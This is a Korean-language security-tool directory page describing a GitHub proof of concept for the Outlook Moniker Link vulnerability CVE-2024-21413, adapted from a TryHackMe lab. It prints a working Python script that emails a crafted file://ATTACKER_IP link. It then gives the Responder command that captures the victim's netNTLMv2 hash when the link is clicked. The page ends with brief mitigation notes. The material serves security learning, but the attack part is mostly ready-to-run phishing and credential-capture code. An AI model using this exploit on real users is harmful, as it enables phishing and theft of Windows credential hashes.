Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Email-exploit-Moniker-Link-CVE-2024-21413- | Kitploit
도구/GitHubGitHub/yass2400012/email-exploit-moniker-link-cve-2024-21413-
Password CrackingExploitationPhishingNetwork SecurityPenetration TestingLearning & EducationRed TeamingEmail SecurityLabs & Practice

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHubyass2400012/email-exploit-moniker-link-cve-2024-21413-

Email-exploit-Moniker-Link-CVE-2024-21413-

저장소 보기
11개월 전아직 검토되지 않음

이메일 익스플로잇 Moniker Link-CVE-2024-21413-Module — 문서

개요: HTML 이메일에서 Moniker Link를 사용해 Outlook의 SMB 연결을 트리거하고, Responder를 통해 피해자의 netNTLMv2 해시를 캡처할 수 있게 하는 실용적인 PoC입니다. 침투 테스트, 스크립팅, 네트워크 프로토콜 분석의 실무 기술을 보여줍니다.


시연된 주요 기술

  • 자동화된 이메일 전송을 위한 Python 스크립팅
  • SMB, NTLMv2, LLMNR, NBT-NS 및 MDNS 프로토콜 이해
  • 해시 캡처를 위한 Responder 구성 및 모니터링
  • Linux 네트워크/DNS 구성 문제 해결
  • 실습 환경에서 통제된 공격적 보안 시나리오 구성

PoC 워크플로우

  1. SMB 리스너 설정: 공격 머신에서 Responder를 시작하여 SMB 인증 시도를 모니터링합니다.
  2. 제작된 이메일 전송: Python 스크립트를 사용하여 공격자의 SMB 공유를 가리키는 Moniker Link(file://)가 포함된 HTML 이메일을 전송합니다.
  3. 해시 캡처: 피해자가 링크를 클릭하면 Outlook이 SMB를 통해 파일을 가져오려 시도하고, Responder가 netNTLMv2 해시를 캡처합니다.

최소 익스플로잇 스크립트

root@kitploit:~
# exploit.py (trimmed)
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.utils import formataddr

sender = '[email protected]'
receiver = '[email protected]'
mailserver = '10.201.52.124'  # THM SMTP server
password = input('Enter attacker email password: ')

html = '<p><a href="file://ATTACKER_IP/test!exploit">Click me</a></p>'

msg = MIMEMultipart()
msg['Subject'] = 'CVE-2024-21413'
msg['From'] = formataddr(('CMNatic', sender))
msg['To'] = receiver
msg.attach(MIMEText(html, 'html'))

with smtplib.SMTP(mailserver, 25) as s:
    s.ehlo()
    s.login(sender, password)
    s.sendmail(sender, [receiver], msg.as_string())
    print('Email delivered')

팁: 실행 전에 ATTACKER_IP와 mailserver를 교체하세요. TryHackMe 실습 환경에서는 비밀번호가 attacker입니다.


Responder 실행

root@kitploit:~
responder -I ens5

ens5를 자신의 네트워크 인터페이스 이름으로 교체하세요.


/etc/resolv.conf 문제 해결

때때로 /etc/resolv.conf의 깨진 심볼릭 링크로 인해 Responder가 실패할 수 있습니다. 다음과 같이 수정합니다:

root@kitploit:~
rm -f /etc/resolv.conf
printf "nameserver 8.8.8.8
nameserver 1.1.1.1
" > /etc/resolv.conf
chmod 644 /etc/resolv.conf
cat /etc/resolv.conf

강조된 기술: Linux 문제 해결, DNS 구성, 클라우드/VM 환경에 도구 적용.


진행 상황 스크린샷

  1. 오류 / Resolv.conf 문제:` Error Resolv.conf

  2. DNS 수정 적용: DNS Setup Fix

  3. Python 이메일 스크립트: Python Email Script

  4. 익스플로잇 전달: Exploit Delivery

  5. 피해자 받은 편지함: Victim Email

  6. 캡처된 피해자 해시: Captured Victim Hash


사용된 도구 및 명령어

  • Responder: SMB/LLMNR/NBT-NS/MDNS 리스너
  • Python3: PoC 이메일 스크립트 실행
  • smtplib / email.mime: 이메일 작성 및 전송을 위한 Python 라이브러리
  • DNS 문제 해결을 위한 Linux 셸 명령어

학습한 기술 / 포트폴리오 강조점

  • 네트워크 공격 시뮬레이션 및 익스플로잇 워크플로우
  • 사회공학 벡터 자동화(Moniker Link 이메일)
  • netNTLMv2 해시 캡처 및 분석
  • 다분야 문제 해결: Python, 네트워킹, Windows 및 Linux 상호 작용
  • 기술 검토자를 위한 문서화 및 워크플로우 발표

완화 및 방어 노트

  • Outlook에서 자동 외부 콘텐츠 비활성화
  • 신뢰할 수 없는 네트워크로의 아웃바운드 SMB 차단
  • Windows 클라이언트에 SMB 서명 및 최신 인증 정책 적용

출처

TryHackMe MonikerLink 실습 및 CMNatic의 원본 PoC(GitHub)에서 각색됨

도구 다운로드